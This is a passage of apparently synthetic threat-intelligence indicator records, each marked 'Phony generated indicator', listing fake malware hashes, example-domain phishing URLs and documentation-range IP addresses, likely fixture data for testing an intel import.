"gkaqme4yo,6sjcfxwzg", "lat": -15, "source": "Phony generated indicator", "state": "active", "update_id": 1386659937, "date_last": "2020-10-09T18:30:13", "trusted_circle_ids": "934,178,808", "srcip": "203.0.113.122", "detail2": "imported by user 61", "value_type": "url", "source_feed_id": 549, "id": 2092019688, "maltype": "malware:y3x", "resource_uri": "/api/v1/intelligence/P36292553556/"} -{"confidence": 57, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "113,378", "detail": "retstif,3m7uezf", "date_first": "2020-10-09T18:30:22", "source": "Phony generated 
indicator", "state": "active", "update_id": 3721503559, "maltype": "malware:3fw", "detail2": "imported by user 286", "value_type": "md5", "md5": "2ad6c703f51b8408fc5ff87b9ddac470", "source_feed_id": 301, "id": 2377145189, "date_last": "2020-10-09T18:30:22", "resource_uri": "/api/v1/intelligence/P47523245321/"} -{"confidence": 40, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "19,233,668", "detail": "", "date_first": "2020-10-09T18:30:23", "source": "Phony generated indicator", "state": "active", "update_id": 1162903246, "maltype": "malware:rbdrt", "detail2": "imported by user 580", "value_type": "md5", "md5": "0c1204a3db8599450c5baca9ea98bead", "source_feed_id": 3635, "id": 1669824905, "date_last": "2020-10-09T18:30:23", "resource_uri": "/api/v1/intelligence/P35828682758/"} -{"confidence": 29, "itype": "phish_url", "severity": "high", "classification": "private", "url": "https://gvco87k.example.net/e2hh0j/hknjg?jfkx=ano5a", "country": "US", "date_first": "2020-10-09T18:30:30", "detail": "c46o", "lat": 14, "source": "Phony generated indicator", "state": "active", "update_id": 3127488037, "date_last": "2020-10-09T18:30:30", "trusted_circle_ids": "794,332", "srcip": "192.0.2.182", "detail2": "imported by user 499", "value_type": "url", "source_feed_id": 112, "id": 2916923635, "maltype": "malware:eaua", "resource_uri": "/api/v1/intelligence/P19079964519/"} -{"confidence": 26, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "91,324,683", "detail": "ho5vs8,1a4z", "date_first": "2020-10-09T18:30:37", "source": "Phony generated indicator", "state": "active", "update_id": 3660166879, "maltype": "malware:83hg3krw", "detail2": "imported by user 379", "value_type": "md5", "md5": "74e29781393cf94f625c4953958e151c", "source_feed_id": 2452, "id": 3376957652, "date_last": "2020-10-09T18:30:37", "resource_uri": "/api/v1/intelligence/P46962365435/"} -{"confidence": 71, "itype": "mal_md5", 
"severity": "low", "classification": "private", "trusted_circle_ids": "972", "detail": "", "date_first": "2020-10-09T18:30:40", "source": "Phony generated indicator", "state": "active", "update_id": 1883789467, "maltype": "malware:0jsn6", "detail2": "imported by user 217", "value_type": "md5", "md5": "b0221fa428aa350fd8068a8b358bb8d1", "source_feed_id": 2420, "id": 1102036683, "date_last": "2020-10-09T18:30:40", "resource_uri": "/api/v1/intelligence/P29674828621/"} -{"confidence": -1, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "341", "detail": "8vyvx,f8fa", "date_first": "2020-10-09T18:30:45", "source": "Phony generated indicator", "state": "active", "update_id": 1469620546, "maltype": "malware:npswwqxur", "detail2": "imported by user 585", "value_type": "md5", "md5": "b54fda907ce762f5c15eea9f5611f20bf2c5a58c8b0ce470fb0220f8a6beb8ed", "source_feed_id": 337, "id": 1755641012, "date_last": "2020-10-09T18:30:45", "resource_uri": "/api/v1/intelligence/P22150106584/"} -{"confidence": 97, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "982", "detail": "lpptj,q1k9t8", "date_first": "2020-10-09T18:30:54", "source": "Phony generated indicator", "state": "active", "update_id": 2286846275, "maltype": "malware:crsln4", "detail2": "imported by user 654", "value_type": "md5", "md5": "c9505088c2dd7d5874fbd546acfcbdbf", "source_feed_id": 2548, "id": 2264305075, "date_last": "2020-10-09T18:30:54", "resource_uri": "/api/v1/intelligence/P16920958546/"} -{"confidence": 18, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "282,501,196", "detail": "", "date_first": "2020-10-09T18:30:59", "source": "Phony generated indicator", "state": "active", "update_id": 2624566147, "maltype": "malware:ic0k2", "detail2": "imported by user 983", "value_type": "md5", "md5": "518adcf2e4bdaec8efd9073ce2f6c3df", "source_feed_id": 1474, "id": 3820774050, "date_last": 
"2020-10-09T18:30:59", "resource_uri": "/api/v1/intelligence/P18289584540/"} -{"confidence": -1, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "655,373", "detail": "", "date_first": "2020-10-09T18:31:10", "source": "Phony generated indicator", "state": "active", "update_id": 2162391647, "maltype": "malware:z52sak97f", "detail2": "imported by user 507", "value_type": "md5", "md5": "24850e70142031153cc664941fac99c0", "source_feed_id": 2109, "id": 2172184194, "date_last": "2020-10-09T18:31:10", "resource_uri": "/api/v1/intelligence/P31588497153/"} -{"confidence": 76, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "73,499,113", "detail": "", "date_first": "2020-10-09T18:31:16", "source": "Phony generated indicator", "state": "active", "update_id": 3288929432, "maltype": "malware:2ipuo01kx", "detail2": "imported by user 984", "value_type": "md5", "md5": "b0843e4bd909b4b20f5e81e431a08015", "source_feed_id": 3889, "id": 2495580437, "date_last": "2020-10-09T18:31:16", "resource_uri": "/api/v1/intelligence/P33175520615/"} -{"confidence": 35, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "189,472,793", "detail": "", "date_first": "2020-10-09T18:31:22", "source": "Phony generated indicator", "state": "active", "update_id": 1526125097, "maltype": "malware:pbxd8", "detail2": "imported by user 792", "value_type": "md5", "md5": "2d0f307b5a552f7cf178e8181010e2d6", "source_feed_id": 2922, "id": 3454531387, "date_last": "2020-10-09T18:31:22", "resource_uri": "/api/v1/intelligence/P26109533305/"} -{"confidence": 27, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "236,515", "detail": "qm8gtmj,kvprr,nyq1os5,mask=2001:db8:562a:384c:c1c3:b4fe:da0b:72cc,threat=ns07", "date_first": "2020-10-09T18:31:27", "source": "Phony generated indicator", "state": "active", "update_id": 1420302328, "maltype": 
"malware:c-xb3z6", "detail2": "imported by user 892", "value_type": "md5", "md5": "b09fa69176349ad1e90ed86e0974f7a3", "source_feed_id": 3580, "id": 3593911368, "date_last": "2020-10-09T18:31:27", "resource_uri": "/api/v1/intelligence/P49819022001/"} -{"confidence": 66, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "793", "detail": "", "date_first": "2020-10-09T18:31:29", "source": "Phony generated indicator", "state": "active", "update_id": 3330750821, "maltype": "malware:77if", "detail2": "imported by user 995", "value_type": "md5", "md5": "29cbc0f83dd2a10e2803ef962bc22a9d", "source_feed_id": 2593, "id": 1790978719, "date_last": "2020-10-09T18:31:29", "resource_uri": "/api/v1/intelligence/P13903806053/"} -{"confidence": -1, "itype": "phish_url", "severity": "medium", "classification": "public", "url": "https://6x78ivr.example.net/ibqk/z-kgi3?z9450cw=yu11h86-6", "country": "US", "date_first": "2020-10-09T18:31:34", "detail": "9onb7n0", "lat": 36, "source": "Phony generated indicator", "state": "active", "update_id": 1930858440, "date_last": "2020-10-09T18:31:34", "trusted_circle_ids": "472", "srcip": "203.0.113.219", "detail2": "imported by user 762", "value_type": "url", "source_feed_id": 1594, "id": 2703977730, "maltype": "malware:0l3", "resource_uri": "/api/v1/intelligence/P40573280971/"} -{"confidence": -1, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "779,394", "detail": "nxym,vvb-ttegv", "date_first": "2020-10-09T18:31:36", "source": "Phony generated indicator", "state": "active", "update_id": 3007961665, "maltype": "malware:im9rh6a2", "detail2": "imported by user 739", "value_type": "md5", "md5": "c030aac4be48a8bc1300fce144a39ca6151544bee4ca47d54a559acd8ca9a7f2", "source_feed_id": 3037, "id": 3180105466, "date_last": "2020-10-09T18:31:36", "resource_uri": "/api/v1/intelligence/P46592136975/"} -{"confidence": 51, "itype": "mal_md5", "severity": "medium", 
"classification": "private", "trusted_circle_ids": "148,701", "detail": "", "date_first": "2020-10-09T18:31:39", "source": "Phony generated indicator", "state": "active", "update_id": 3987533970, "maltype": "malware:xr2vy", "detail2": "imported by user 684", "value_type": "md5", "md5": "b1cb5ed5d82e42a1e4afcd6d53cf99ea", "source_feed_id": 3268, "id": 2718137308, "date_last": "2020-10-09T18:31:39", "resource_uri": "/api/v1/intelligence/P20125331715/"} -{"confidence": 69, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "42", "detail": "qns,s8eho", "date_first": "2020-10-09T18:31:43", "source": "Phony generated indicator", "state": "active", "update_id": 2686121759, "maltype": "malware:qt199", "detail2": "imported by user 669", "value_type": "md5", "md5": "4e319ec817873f80393a5dd024f71ca7", "source_feed_id": 2063, "id": 1415663416, "date_last": "2020-10-09T18:31:43", "resource_uri": "/api/v1/intelligence/P13616238585/"} -{"confidence": -1, "itype": "scan_ip", "severity": "low", "classification": "private", "country": "DE", "date_first": "2020-10-09T18:31:49", "detail": "", "lat": 46, "source": "Phony generated indicator", "state": "active", "update_id": 1368674489, "date_last": "2020-10-09T18:31:49", "trusted_circle_ids": "187", "srcip": "203.0.113.62", "detail2": "imported by user 989", "value_type": "ip", "source_feed_id": 2338, "id": 3617882514, "maltype": "malware:axi", "resource_uri": "/api/v1/intelligence/P34950154880/"} -{"confidence": 7, "itype": "phish_url", "severity": "very-high", "classification": "private", "url": "http://vgge6wq.example.net/p3ij2qg5/32unmbyea?kx0=o-x", "country": "US", "date_first": "2020-10-09T18:31:49", "detail": "eo1axyco", "lat": 23, "source": "Phony generated indicator", "state": "active", "update_id": 1737632407, "date_last": "2020-10-09T18:31:49", "trusted_circle_ids": "1,987,503", "srcip": "203.0.113.16", "detail2": "imported by user 144", "value_type": "url", "source_feed_id": 1907, 
"id": 2183445671, "maltype": "malware:ens", "resource_uri": "/api/v1/intelligence/P32340211585/"} -{"confidence": -1, "itype": "phish_url", "severity": "high", "classification": "private", "url": "https://g-5wb4c.example.net/uo4v/-m33cfxe?cl7aculw9=x0vtjg6n4", "country": "US", "date_first": "2020-10-09T18:31:58", "detail": "uc3ji", "lat": -27, "source": "Phony generated indicator", "state": "active", "update_id": 1303579438, "date_last": "2020-10-09T18:31:58", "trusted_circle_ids": "499", "srcip": "203.0.113.160", "detail2": "imported by user 558", "value_type": "url", "source_feed_id": 3750, "id": 2736376437, "maltype": "malware:b2hm", "resource_uri": "/api/v1/intelligence/P17661934088/"} -{"confidence": 61, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "938", "detail": "", "date_first": "2020-10-09T18:32:02", "source": "Phony generated indicator", "state": "active", "update_id": 2352882311, "maltype": "malware:ggvm4q", "detail2": "imported by user 193", "value_type": "md5", "md5": "4ba68dadfb7cb40e78ccd27fd66f732c", "source_feed_id": 1297, "id": 2684269934, "date_last": "2020-10-09T18:32:02", "resource_uri": "/api/v1/intelligence/P17181153596/"} -{"confidence": -1, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "324,530,73", "detail": "fter66,wsb3tlc7", "date_first": "2020-10-09T18:32:03", "source": "Phony generated indicator", "state": "active", "update_id": 1252111059, "maltype": "malware:isy7km0sh", "detail2": "imported by user 363", "value_type": "md5", "md5": "7b31a1a59bae209e55f53b363b9222f93f03a83c9e112852f199521a9bcf4fc5", "source_feed_id": 819, "id": 2020869646, "date_last": "2020-10-09T18:32:03", "resource_uri": "/api/v1/intelligence/P30344381094/"} -{"confidence": 36, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "501", "detail": "", "date_first": "2020-10-09T18:32:04", "source": "Phony generated indicator", 
"state": "active", "update_id": 3372666916, "maltype": "malware:ae8u", "detail2": "imported by user 351", "value_type": "md5", "md5": "0050e5d31f9bf0ecf3b81f7799b92525", "source_feed_id": 2699, "id": 2290504913, "date_last": "2020-10-09T18:32:04", "resource_uri": "/api/v1/intelligence/P25291610896/"} -{"confidence": 82, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "924,134,532", "detail": "", "date_first": "2020-10-09T18:32:08", "source": "Phony generated indicator", "state": "active", "update_id": 3906793036, "maltype": "malware:z88yzsto", "detail2": "imported by user 805", "value_type": "md5", "md5": "f2a382c1573fba4245761f4ae80d17f6", "source_feed_id": 566, "id": 2703081376, "date_last": "2020-10-09T18:32:08", "resource_uri": "/api/v1/intelligence/P30547747040/"} -{"confidence": 64, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "967,983,715", "detail": "", "date_first": "2020-10-09T18:32:11", "source": "Phony generated indicator", "state": "active", "update_id": 1686957810, "maltype": "malware:y2xzvvpfu", "detail2": "imported by user 699", "value_type": "md5", "md5": "cfa25fe3deff6c9e3c5ef77664275fe34c01f2bed4e849e4f23894780974d496", "source_feed_id": 157, "id": 3547132893, "date_last": "2020-10-09T18:32:11", "resource_uri": "/api/v1/intelligence/P41360346077/"} -{"confidence": 43, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "619,401", "detail": "", "date_first": "2020-10-09T18:32:19", "source": "Phony generated indicator", "state": "active", "update_id": 2895957620, "maltype": "malware:0re8iaji", "detail2": "imported by user 349", "value_type": "md5", "md5": "7d379c8c8462a4a8a7f49f423274d030", "source_feed_id": 2293, "id": 3805778271, "date_last": "2020-10-09T18:32:19", "resource_uri": "/api/v1/intelligence/P19192265363/"} -{"confidence": 13, "itype": "scan_ip", "severity": "medium", "classification": "private", "country": 
"CN", "date_first": "2020-10-09T18:32:30", "detail": "", "lat": -38, "source": "Phony generated indicator", "state": "active", "update_id": 1226861060, "date_last": "2020-10-09T18:32:30", "trusted_circle_ids": "238,301", "srcip": "203.0.113.33", "detail2": "imported by user 363", "value_type": "ip", "source_feed_id": 1310, "id": 1401034980, "maltype": "malware:wnar", "resource_uri": "/api/v1/intelligence/P31097047895/"} -{"confidence": 90, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "105", "detail": "", "date_first": "2020-10-09T18:32:35", "source": "Phony generated indicator", "state": "active", "update_id": 3193095576, "maltype": "malware:9x0-q2", "detail2": "imported by user 41", "value_type": "md5", "md5": "8501f8ba604247e7b843f44d0fa39283", "source_feed_id": 3358, "id": 2929715396, "date_last": "2020-10-09T18:32:35", "resource_uri": "/api/v1/intelligence/P16926565414/"} -{"confidence": 80, "itype": "phish_url", "severity": "medium", "classification": "public", "url": "https://fodvsh.example.org/hqbr/dj32sw6-?d-1vo=zk458v0c", "country": "US", "date_first": "2020-10-09T18:33:10", "detail": "fp-3s3-", "lat": -27, "source": "Phony generated indicator", "state": "active", "update_id": 1909602212, "date_last": "2020-10-09T18:33:10", "trusted_circle_ids": "633", "srcip": "203.0.113.224", "detail2": "imported by user 442", "value_type": "url", "source_feed_id": 1262, "id": 3203248155, "maltype": "malware:c2lvfcl", "resource_uri": "/api/v1/intelligence/P34598289945/"} -{"confidence": 93, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "247,633", "detail": "", "date_first": "2020-10-09T18:33:13", "source": "Phony generated indicator", "state": "active", "update_id": 3152387474, "maltype": "malware:2v2dqt6k", "detail2": "imported by user 589", "value_type": "md5", "md5": "1091936e285244f3666848a8abf8280fd10a15d23ff9d196ed9e95256c6b91b9", "source_feed_id": 257, "id": 1344271853, 
"date_last": "2020-10-09T18:33:13", "resource_uri": "/api/v1/intelligence/P20106213042/"} -{"confidence": 22, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "869", "detail": "", "date_first": "2020-10-09T18:33:14", "source": "Phony generated indicator", "state": "active", "update_id": 1362676688, "maltype": "malware:10w", "detail2": "imported by user 225", "value_type": "md5", "md5": "a4eed62e00de9ffe130d286c7b5d09130ccdf423", "source_feed_id": 2060, "id": 1409521915, "date_last": "2020-10-09T18:33:14", "resource_uri": "/api/v1/intelligence/P42448549960/"} -{"confidence": 0, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "505", "detail": "", "date_first": "2020-10-09T18:33:14", "source": "Phony generated indicator", "state": "active", "update_id": 2357099704, "maltype": "malware:g0z", "detail2": "imported by user 714", "value_type": "md5", "md5": "fe1ed2a7475cec963c2bb419f2a7c689", "source_feed_id": 2527, "id": 1536611967, "date_last": "2020-10-09T18:33:14", "resource_uri": "/api/v1/intelligence/P13255407178/"} -{"confidence": 8, "itype": "phish_url", "severity": "medium", "classification": "public", "url": "http://qfe6d.example.net/nk1a0m71c/qp0?t6yd498=3-8th2", "country": "US", "date_first": "2020-10-09T18:33:22", "detail": "2bqsik", "lat": -24, "source": "Phony generated indicator", "state": "active", "update_id": 2574696234, "date_last": "2020-10-09T18:33:22", "trusted_circle_ids": "815,80", "srcip": "203.0.113.147", "detail2": "imported by user 711", "value_type": "url", "source_feed_id": 340, "id": 3554768995, "maltype": "malware:xb2awlx", "resource_uri": "/api/v1/intelligence/P34181538928/"} -{"confidence": 12, "itype": "mal_md5", "severity": "high", "classification": "public", "trusted_circle_ids": "717", "detail": "fuge7j6,yhmk", "date_first": "2020-10-09T18:33:24", "source": "Phony generated indicator", "state": "active", "update_id": 1606866217, "maltype": 
"malware:k9fxm7g27", "detail2": "imported by user 657", "value_type": "md5", "md5": "1d1a366dfae08f4f20e7265ce03c194c", "source_feed_id": 3452, "id": 2657255157, "date_last": "2020-10-09T18:33:24", "resource_uri": "/api/v1/intelligence/P30838854666/"} -{"confidence": 40, "itype": "phish_url", "severity": "low", "classification": "public", "url": "http://bn2w.example.org/buurw/6xdra3p7p?7u2frmxc=z82j1gt", "country": "US", "date_first": "2020-10-09T18:33:26", "detail": "o7z-", "lat": -26, "source": "Phony generated indicator", "state": "active", "update_id": 1217624857, "date_last": "2020-10-09T18:33:26", "trusted_circle_ids": "778", "srcip": "203.0.113.102", "detail2": "imported by user 395", "value_type": "url", "source_feed_id": 2196, "id": 2981028957, "maltype": "malware:15a5ax", "resource_uri": "/api/v1/intelligence/P31969585221/"} -{"confidence": 89, "itype": "phish_url", "severity": "very-high", "classification": "private", "url": "http://jzaz.example.com/h6v8mxqh/ntr?dif3b=53dmuir", "country": "US", "date_first": "2020-10-09T18:33:27", "detail": "teyku", "lat": -46, "source": "Phony generated indicator", "state": "active", "update_id": 2065962650, "date_last": "2020-10-09T18:33:27", "trusted_circle_ids": "430,191", "srcip": "203.0.113.246", "detail2": "imported by user 108", "value_type": "url", "source_feed_id": 705, "id": 3698734512, "maltype": "malware:mhlpzbtu", "resource_uri": "/api/v1/intelligence/P12593861505/"} -{"confidence": 11, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "517,469,743", "detail": "-0jlm,tmxqwg", "date_first": "2020-10-09T18:33:29", "source": "Phony generated indicator", "state": "active", "update_id": 1904470545, "maltype": "malware:81eom", "detail2": "imported by user 17", "value_type": "md5", "md5": "5887cb3906519b42df2e8b6755e83588", "source_feed_id": 3247, "id": 2666238854, "date_last": "2020-10-09T18:33:29", "resource_uri": "/api/v1/intelligence/P21844887028/"} -{"confidence": 63, 
"itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "411,474,991", "detail": "", "date_first": "2020-10-09T18:33:43", "source": "Phony generated indicator", "state": "active", "update_id": 3051330569, "maltype": "malware:dho5kpeg", "detail2": "imported by user 860", "value_type": "md5", "md5": "2f1a7f0591e2dbc94dcc994b612c44a2c4eda007", "source_feed_id": 3139, "id": 1926950021, "date_last": "2020-10-09T18:33:43", "resource_uri": "/api/v1/intelligence/P25323157194/"} -{"confidence": -1, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "660,616", "detail": "as3fg1e,f-8n3", "date_first": "2020-10-09T18:33:45", "source": "Phony generated indicator", "state": "active", "update_id": 3670259337, "maltype": "malware:ysi", "detail2": "imported by user 368", "value_type": "md5", "md5": "0fe1b140ae86038a7c06002d9897c9f84695d0d64dfaec1344f2f2157855b5d9", "source_feed_id": 400, "id": 3051200032, "date_last": "2020-10-09T18:33:45", "resource_uri": "/api/v1/intelligence/P23391147747/"} -{"confidence": 47, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "183,729,874", "detail": "", "date_first": "2020-10-09T18:33:45", "source": "Phony generated indicator", "state": "active", "update_id": 1443383610, "maltype": "malware:tr4fyclye", "detail2": "imported by user 792", "value_type": "md5", "md5": "e3d11c062f057cd832380a6083b1a39c", "source_feed_id": 3002, "id": 1354407474, "date_last": "2020-10-09T18:33:45", "resource_uri": "/api/v1/intelligence/P22953994442/"} -{"confidence": 98, "itype": "phish_url", "severity": "low", "classification": "public", "url": "http://9z2mc0i0.example.org/lzgwxax8/a7amlcak5?wpm=-3trptis8", "country": "US", "date_first": "2020-10-09T18:33:48", "detail": "mn0-hjh", "lat": 25, "source": "Phony generated indicator", "state": "active", "update_id": 3284440485, "date_last": "2020-10-09T18:33:48", "trusted_circle_ids": "691,420,893", 
"srcip": "2001:db8:67ba:fcb2:d55:a7fa:2598:ae42", "detail2": "imported by user 311", "value_type": "url", "source_feed_id": 149, "id": 1667086710, "maltype": "malware:-xz6gfl", "resource_uri": "/api/v1/intelligence/P18360954259/"} -{"confidence": -1, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "510,513,848", "detail": "", "date_first": "2020-10-09T18:33:51", "source": "Phony generated indicator", "state": "active", "update_id": 1142201825, "maltype": "malware:02t7-", "detail2": "imported by user 621", "value_type": "md5", "md5": "3f6f09f334644cc346c5287ea1b882dc", "source_feed_id": 1791, "id": 1934575663, "date_last": "2020-10-09T18:33:51", "resource_uri": "/api/v1/intelligence/P19488087496/"} -{"confidence": 30, "itype": "scan_ip", "severity": "medium", "classification": "private", "country": "VN", "date_first": "2020-10-09T18:33:57", "detail": "tf5", "lat": 72, "source": "Phony generated indicator", "state": "active", "update_id": 3964602459, "date_last": "2020-10-09T18:33:57", "trusted_circle_ids": "700", "srcip": "192.0.2.71", "detail2": "imported by user 601", "value_type": "ip", "source_feed_id": 571, "id": 1272291122, "maltype": "malware:rsb5ngghr", "resource_uri": "/api/v1/intelligence/P16583752489/"} -{"confidence": 79, "itype": "scan_ip", "severity": "low", "classification": "private", "country": "DE", "date_first": "2020-10-09T18:34:00", "detail": "", "lat": -58, "source": "Phony generated indicator", "state": "active", "update_id": 2657223507, "date_last": "2020-10-09T18:34:00", "trusted_circle_ids": "803,69", "srcip": "192.0.2.235", "detail2": "imported by user 626", "value_type": "ip", "source_feed_id": 1177, "id": 1668635783, "maltype": "malware:vmnc9l", "resource_uri": "/api/v1/intelligence/P34957223138/"} -{"confidence": -1, "itype": "phish_url", "severity": "high", "classification": "private", "url": "http://ympwx2jf1.example.net/890p6/iguh3?5jy=fahiq4", "country": "US", "date_first": 
"2020-10-09T18:34:00", "detail": "yf49u", "lat": -83, "source": "Phony generated indicator", "state": "active", "update_id": 1543283855, "date_last": "2020-10-09T18:34:00", "trusted_circle_ids": "811,902,371", "srcip": "203.0.113.95", "detail2": "imported by user 121", "value_type": "url", "source_feed_id": 719, "id": 1137463089, "maltype": "malware:h51vga", "resource_uri": "/api/v1/intelligence/P18958880936/"} -{"confidence": 8, "itype": "scan_ip", "severity": "high", "classification": "private", "country": "IN", "date_first": "2020-10-09T18:34:00", "detail": "", "lat": 75, "source": "Phony generated indicator", "state": "active", "update_id": 1628664867, "date_last": "2020-10-09T18:34:00", "trusted_circle_ids": "631,979,873", "srcip": "203.0.113.175", "detail2": "imported by user 167", "value_type": "ip", "source_feed_id": 2012, "id": 1146448215, "maltype": "malware:wzzptkr", "resource_uri": "/api/v1/intelligence/P20038844379/"} -{"confidence": 37, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "952", "detail": "vq2o7pjq,tdc6q", "date_first": "2020-10-09T18:34:02", "source": "Phony generated indicator", "state": "active", "update_id": 3699527729, "maltype": "malware:pcy1a", "detail2": "imported by user 785", "value_type": "md5", "md5": "0b8fe53828f507e8b1572464e8beb8d2", "source_feed_id": 2054, "id": 3342007313, "date_last": "2020-10-09T18:34:02", "resource_uri": "/api/v1/intelligence/P36611314384/"} -{"confidence": 2, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "820", "detail": "8z4eg6,xjauqb", "date_first": "2020-10-09T18:34:05", "source": "Phony generated indicator", "state": "active", "update_id": 3409540543, "maltype": "malware:ae6", "detail2": "imported by user 789", "value_type": "md5", "md5": "21ed28c2da7c8adddde64ccacd40ce3f52dee0ea", "source_feed_id": 3508, "id": 2108441946, "date_last": "2020-10-09T18:34:05", "resource_uri": "/api/v1/intelligence/P17045327948/"} 
-{"confidence": 40, "itype": "mal_md5", "severity": "high", "classification": "public", "trusted_circle_ids": "392,229,422", "detail": "", "date_first": "2020-10-09T18:34:11", "source": "Phony generated indicator", "state": "active", "update_id": 1815840512, "maltype": "malware:8jbxuap", "detail2": "imported by user 719", "value_type": "md5", "md5": "553c1e7e4db2069f8609d022e544a59e", "source_feed_id": 3692, "id": 1343445259, "date_last": "2020-10-09T18:34:11", "resource_uri": "/api/v1/intelligence/P13310857660/"} -{"confidence": 23, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "700,516,849", "detail": "", "date_first": "2020-10-09T18:34:12", "source": "Phony generated indicator", "state": "active", "update_id": 3554320846, "maltype": "malware:q2i-", "detail2": "imported by user 103", "value_type": "md5", "md5": "1ec74325ddc9654875de312995aa10d3ec4fb602b6341d99543df2ee8682f2db", "source_feed_id": 997, "id": 1630307640, "date_last": "2020-10-09T18:34:12", "resource_uri": "/api/v1/intelligence/P29544608921/"} -{"confidence": 91, "itype": "phish_url", "severity": "low", "classification": "private", "url": "http://46c1divph.example.com/orp/hvq262r?i0bgqt=ng7", "country": "US", "date_first": "2020-10-09T18:34:17", "detail": "s84k3bdjq", "lat": 32, "source": "Phony generated indicator", "state": "active", "update_id": 2877503512, "date_last": "2020-10-09T18:34:17", "trusted_circle_ids": "810,945", "srcip": "203.0.113.90", "detail2": "imported by user 52", "value_type": "url", "source_feed_id": 2567, "id": 2897748835, "maltype": "malware:h9k", "resource_uri": "/api/v1/intelligence/P41345577982/"} -{"confidence": 32, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "273,433,607", "detail": "9if35ri,x9mh2nmp", "date_first": "2020-10-09T18:34:20", "source": "Phony generated indicator", "state": "active", "update_id": 1488878245, "maltype": "malware:yaod", "detail2": "imported by user 
711", "value_type": "md5", "md5": "a702f234e4325d2d0873ee0df36ec5ed", "source_feed_id": 2322, "id": 3274675511, "date_last": "2020-10-09T18:34:20", "resource_uri": "/api/v1/intelligence/P45003453869/"} -{"confidence": 20, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "428", "detail": "qok4w,c57f", "date_first": "2020-10-09T18:34:20", "source": "Phony generated indicator", "state": "active", "update_id": 1123945820, "maltype": "malware:l4pxxd", "detail2": "imported by user 925", "value_type": "md5", "md5": "1c8f45e88808d5b8a1c30f5702aebf15", "source_feed_id": 2655, "id": 1030722740, "date_last": "2020-10-09T18:34:20", "resource_uri": "/api/v1/intelligence/P48506246601/"} -{"confidence": 74, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "866", "detail": "ysx9,9lz-", "date_first": "2020-10-09T18:34:32", "source": "Phony generated indicator", "state": "active", "update_id": 3494659712, "maltype": "malware:byzh4", "detail2": "imported by user 530", "value_type": "md5", "md5": "93704cc3891baa0a9b16dafad00014d6", "source_feed_id": 3111, "id": 1593012346, "date_last": "2020-10-09T18:34:32", "resource_uri": "/api/v1/intelligence/P29641147646/"} -{"confidence": 66, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "781,694", "detail": "", "date_first": "2020-10-09T18:34:32", "source": "Phony generated indicator", "state": "active", "update_id": 2409760108, "maltype": "malware:wpa6yzhs", "detail2": "imported by user 219", "value_type": "md5", "md5": "ab9e633068964a987f98d2a37990d3121950c560a01ae70f29459473982d8110", "source_feed_id": 2607, "id": 3246059116, "date_last": "2020-10-09T18:34:32", "resource_uri": "/api/v1/intelligence/P43119043261/"} -{"confidence": 74, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "289,549,398", "detail": "", "date_first": "2020-10-09T18:34:39", "source": "Phony 
generated indicator", "state": "active", "update_id": 3725628559, "maltype": "malware:5qar", "detail2": "imported by user 562", "value_type": "md5", "md5": "2659963ab036c0ecea30aeb07add719a69ef7a4539b15babaffbca4b8eaac524", "source_feed_id": 3860, "id": 3562521087, "date_last": "2020-10-09T18:34:39", "resource_uri": "/api/v1/intelligence/P14872208985/"} -{"confidence": 42, "itype": "mal_md5", "severity": "high", "classification": "public", "trusted_circle_ids": "65,853", "detail": "-fk,s7w8", "date_first": "2020-10-09T18:34:40", "source": "Phony generated indicator", "state": "active", "update_id": 3830742455, "maltype": "malware:oz3", "detail2": "imported by user 592", "value_type": "md5", "md5": "f2759054c256666baec126b4548cfcccab4a34cd58f7ba5796a23ca55220f99b", "source_feed_id": 3217, "id": 1329604422, "date_last": "2020-10-09T18:34:40", "resource_uri": "/api/v1/intelligence/P49868900128/"} -{"confidence": 44, "itype": "scan_ip", "severity": "low", "classification": "private", "country": "VN", "date_first": "2020-10-09T18:34:41", "detail": "", "lat": -58, "source": "Phony generated indicator", "state": "active", "update_id": 3439346683, "date_last": "2020-10-09T18:34:41", "trusted_circle_ids": "614", "srcip": "192.0.2.202", "detail2": "imported by user 591", "value_type": "ip", "source_feed_id": 2389, "id": 1109013844, "maltype": "malware:t-b-", "resource_uri": "/api/v1/intelligence/P48450091770/"} -{"confidence": 26, "itype": "phish_url", 